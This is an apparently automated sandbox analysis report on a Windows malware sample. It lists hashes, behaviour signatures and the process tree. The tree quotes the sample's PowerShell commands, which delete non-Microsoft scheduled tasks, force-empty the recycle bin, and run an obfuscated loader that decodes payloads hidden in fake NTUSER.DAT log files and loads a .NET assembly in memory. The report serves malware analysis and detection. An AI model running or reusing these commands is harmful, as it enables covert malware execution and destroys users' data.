Analysis
max time kernel: 96s
max time network: 97s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 19-09-2024 07:05
Static task: static1
Behavioral task: behavioral1
Sample: 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
Resource: win10v2004-20240802-en
General
Target: 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
Size: 4.8MB
MD5: 314416cd8a7ca237e550fd7b77acf770
SHA1: fb7e229e6782aba64a9d781d0605aed586627331
SHA256: 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476
SHA512: 831b85064956d3372f7e7019900aea5c96cfa4ae9b3d1a2ff904376191fe1fc2452d7d13ce701b3fce3765c867effd4d0b6c0d5f7d1d725c79ed9c53f8621f1d
SSDEEP: 49152:uqj00f62wSvIi8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj63W:uieSvPy0IKoKHHIMzx5bN84s
Malware Config
Signatures
pid Process
3708 powershell.exe
1916 powershell.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
File opened (read-only) \??\F: powershell.exe
Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
pid Process
3564 powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process
1916 powershell.exe
1916 powershell.exe
3564 powershell.exe
3564 powershell.exe
3708 powershell.exe
3708 powershell.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process
Token: SeDebugPrivilege 1916 powershell.exe
Token: SeIncreaseQuotaPrivilege 1916 powershell.exe
Token: SeSecurityPrivilege 1916 powershell.exe
Token: SeTakeOwnershipPrivilege 1916 powershell.exe
Token: SeLoadDriverPrivilege 1916 powershell.exe
Token: SeSystemProfilePrivilege 1916 powershell.exe
Token: SeSystemtimePrivilege 1916 powershell.exe
Token: SeProfSingleProcessPrivilege 1916 powershell.exe
Token: SeIncBasePriorityPrivilege 1916 powershell.exe
Token: SeCreatePagefilePrivilege 1916 powershell.exe
Token: SeBackupPrivilege 1916 powershell.exe
Token: SeRestorePrivilege 1916 powershell.exe
Token: SeShutdownPrivilege 1916 powershell.exe
Token: SeDebugPrivilege 1916 powershell.exe
Token: SeSystemEnvironmentPrivilege 1916 powershell.exe
Token: SeRemoteShutdownPrivilege 1916 powershell.exe
Token: SeUndockPrivilege 1916 powershell.exe
Token: SeManageVolumePrivilege 1916 powershell.exe
Token: 33 1916 powershell.exe
Token: 34 1916 powershell.exe
Token: 35 1916 powershell.exe
Token: 36 1916 powershell.exe
Token: SeDebugPrivilege 3564 powershell.exe
Token: SeDebugPrivilege 3708 powershell.exe
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target
PID 4220 wrote to memory of 1916 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 83
PID 4220 wrote to memory of 1916 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 83
PID 4220 wrote to memory of 3564 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 85
PID 4220 wrote to memory of 3564 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 85
PID 4220 wrote to memory of 3708 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 90
PID 4220 wrote to memory of 3708 4220 5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe 90
Processes
C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
"C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe"
- Suspicious use of WriteProcessMemory
PID:4220

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1916

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"
    - Enumerates connected drives
    - Hide Artifacts: Ignore Process Interrupts
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3564

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3708
Network
MITRE ATT&CK Enterprise v15
Downloads